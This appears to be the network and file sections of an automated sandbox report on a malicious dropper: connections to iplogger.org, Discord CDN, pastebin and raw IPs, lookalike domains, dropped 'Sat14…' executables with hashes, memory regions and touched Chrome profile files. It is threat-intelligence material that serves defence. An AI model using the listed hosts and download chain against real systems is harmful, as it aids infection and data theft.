C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1760 -ip 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1068

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 ip-api.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ppgggb.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 127.0.0.1:53429 tcp
N/A 127.0.0.1:53432 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
GB 72.247.176.16:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 69.5.217.23.in-addr.arpa udp
US 8.8.8.8:53 16.176.247.72.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.16.227:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/3324-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-69-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3324-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/5064-81-0x00000000048F0000-0x0000000004926000-memory.dmp

memory/3324-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4916-85-0x00000000053B0000-0x0000000005416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bjpxbt3k.1n2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

memory/3196-109-0x0000000000530000-0x0000000000548000-memory.dmp

memory/4916-121-0x0000000005A30000-0x0000000005A4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

memory/4508-125-0x0000000000550000-0x0000000000558000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/4916-123-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3196-120-0x00000000025B0000-0x00000000025B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

memory/4444-133-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4080-142-0x0000000000EC0000-0x0000000000F28000-memory.dmp

memory/4080-153-0x00000000056C0000-0x00000000056DE000-memory.dmp

memory/4080-143-0x0000000005740000-0x00000000057B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

memory/4916-95-0x0000000005430000-0x0000000005784000-memory.dmp

memory/4916-84-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/4916-83-0x0000000004A70000-0x0000000004A92000-memory.dmp

memory/4916-82-0x0000000004CA0000-0x00000000052C8000-memory.dmp

memory/3324-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-73-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3324-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3324-66-0x0000000000F10000-0x0000000000F9F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-A8IQH.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3324-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4080-157-0x0000000005F30000-0x00000000064D4000-memory.dmp

memory/5104-162-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4564-159-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4444-164-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DC1JJ.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4808-190-0x0000000000400000-0x0000000000883000-memory.dmp

memory/4916-192-0x0000000006A40000-0x0000000006AE3000-memory.dmp

memory/4916-191-0x00000000069C0000-0x00000000069DE000-memory.dmp

memory/4916-180-0x000000006F740000-0x000000006F78C000-memory.dmp

memory/4916-179-0x0000000006A00000-0x0000000006A32000-memory.dmp

memory/4916-197-0x0000000006D60000-0x0000000006D7A000-memory.dmp

memory/4916-196-0x00000000073A0000-0x0000000007A1A000-memory.dmp

memory/4916-198-0x0000000006DE0000-0x0000000006DEA000-memory.dmp

memory/5064-199-0x000000006F740000-0x000000006F78C000-memory.dmp

memory/4916-210-0x0000000006FD0000-0x0000000007066000-memory.dmp

memory/4916-214-0x0000000006F60000-0x0000000006F71000-memory.dmp

memory/4916-215-0x0000000006F90000-0x0000000006F9E000-memory.dmp

memory/4552-220-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat1427fbafcf251.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4552-221-0x00000000054B0000-0x0000000005AC8000-memory.dmp

memory/4552-223-0x0000000005120000-0x000000000522A000-memory.dmp

memory/4916-224-0x0000000006FA0000-0x0000000006FB4000-memory.dmp

memory/4552-222-0x0000000004FF0000-0x0000000005002000-memory.dmp

memory/4552-225-0x0000000005050000-0x000000000508C000-memory.dmp

memory/4916-226-0x0000000007090000-0x00000000070AA000-memory.dmp

memory/4916-227-0x0000000007080000-0x0000000007088000-memory.dmp

memory/5064-230-0x0000000007430000-0x0000000007444000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2edbefff067e8e9e714f0d5589bcfc5b
SHA1 2cf5c175253d998a496b6a03d910d1702a37a973
SHA256 c9f47d817dff2000bf30f1a3e99590a7ca3004a2d79bc44f908a493ba0fd7817
SHA512 e473070ad505adf395b4222c50c19315c2fb11fae517d70567d79742e3e6d993977732bb300f453b17f3d08c00a6768c19383c45ceb1cd8497c4a226f62fd246

C:\Users\Admin\AppData\Local\Temp\lkyqBUE.m

MD5 ce2da93761dc1ddb916fd1474c2a4e8f
SHA1 5d04fad0fd8df47a2cf322288a9ef5bbe85a783c
SHA256 c5284035228617e55e3ddb94d5900a0a460d292ad121b8ad6f0c10497a700673
SHA512 77f4dfa33e102f0b3d94a167413f3ef30dcd522d4a3c000203521449e385bba4b5691f38408e75b378cc62d9fed98b460e6e1daa0251332aa9105d52d54a5b44

C:\Users\Admin\AppData\Local\Temp\vuR_hcMP.3T

MD5 c7d6c3ce016c46c94cfcda0c814f2889
SHA1 a552326f590bbf8d2f9a69a23863cefd83ff9687
SHA256 733e5e284c182b6de7e2d287a4b12722cfba8c393dd82bb11c766cbe5b94bb43
SHA512 6c6e7538a0f5c91be742caaab91cc3e87f8574a2a492831015f16d8e01e3fb9a9f11abc3155b4c573c7305e4057ce6013f2cbf4dd710b4a2773339790ea97a08

C:\Users\Admin\AppData\Local\Temp\9h1gI_ny.t

MD5 719406c6176706f60d8f511ce6096c2d
SHA1 5044cc1af74e9d762feabdfe1fa46ad558249a65
SHA256 53642a2d499eb8bc9fdc9c27344436dc5989f9f493c4d21648172b7110e906a0
SHA512 9c00fda0639daaae2882f2932ab8e1b29403b9434473bb34f10d229b33f68d973f1a8b73968b7386ad9d4551cad6cb8ec86c1f45fa57637e0cfcae0c7b0b911e

C:\Users\Admin\AppData\Local\Temp\i5glXU.q

MD5 df345237695fb3974d0adb7ba892db7b
SHA1 4f6904679510f87b4e3df83e4c1f3804cb4aa773
SHA256 76a22ff20b5a218c06469f45c87209471b7f5f33fb680ed539efb090c1632bad
SHA512 bf43ae459535b92f739413aeee3cdb8f27ace4e0009024e0381b13632e1dbc23df667eab924959c43b805b1305dabe6caaf88785fb0ab1d45544d9d46ba7d50e

C:\Users\Admin\AppData\Local\Temp\U9bIuq0J.~dW

MD5 dcb29594703e229efa20bedff41fe3e6
SHA1 7473bf4265ce63a48d46f76af3a709eeb89e5363
SHA256 f0f3e4ac0575c8cca414c05075dc4ec3f9fa987a63942d5ec222758eadca2331
SHA512 bd8e007cc26bf03d202c6cd6a5655d3aebef4ac61e39306fa139f52e1bb051a29c7d088fac3717c57ec23fea6be7260c1d1917a9c76f6bb2c207b2d10b68f982

C:\Users\Admin\AppData\Local\Temp\PajLCM.4

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\2KSA.GF7

MD5 f7289e6a08c21ac5aa08fd51633251a5
SHA1 f052534107af91a3514afb93a1b29e28d8b24a51
SHA256 4020eafc401fc35a7d1e5e4e1dfb6b41ba6a01237a34328b38d9af67f3f26a17
SHA512 0780e065a47fa6a97ae534a78632b8dc7326dc81c561b57b361cc50f07adef519581dc571aee010c615e509fd11ca809143be90160504ea182fd0e3ffe0a6c8a

memory/3324-265-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3324-269-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d0a8de164afe485a7233e1d55ba4347f
SHA1 c760af9ae23dd96a2b4606881b148c945d74fe7b
SHA256 5ca88d50743cb188cc6908ea0262995adb8ec4702c441d4b837515e9a2fbfb27
SHA512 e66b69286f9efa855c753bbee4307383d553c4a53e5ee2677fc67a11750e1f95374cd4fd7f81c3c65fa3683710c88c89ae4af9211ba347ee664522eff648b429

\??\pipe\crashpad_684_TVIGLFXSNMNFPSFG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/212-281-0x0000000002FE0000-0x0000000003085000-memory.dmp

memory/212-285-0x00000000030A0000-0x0000000003132000-memory.dmp

memory/212-288-0x00000000030A0000-0x0000000003132000-memory.dmp

memory/3324-289-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-290-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e9a6a4233bf87c319adf0db34e9d603a
SHA1 4de771cbe86611d85d0b8793c7192b8314f7dd02
SHA256 0b3f5ac3e92b578449e901ea9a2ccf66e30f2e437a74105405b5ee0000a05687
SHA512 de3e336b5260286a97d61690c2ab23db98583e6234aee50848b44a6dcf83b99dbf8a2061cd8481b50c1f81c134d1baaf01e4e5a33572ab0d23ec4ddd94c61b7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e1cc10c4812bfbc50a2fed24bdda4a7d
SHA1 8947bbe29dbc7fcf1a0ffa28164c3af138474a90
SHA256 7bfff06c910fa94715da000abf4530aecb8bc722ae32ae3e1740f341a5d1118a
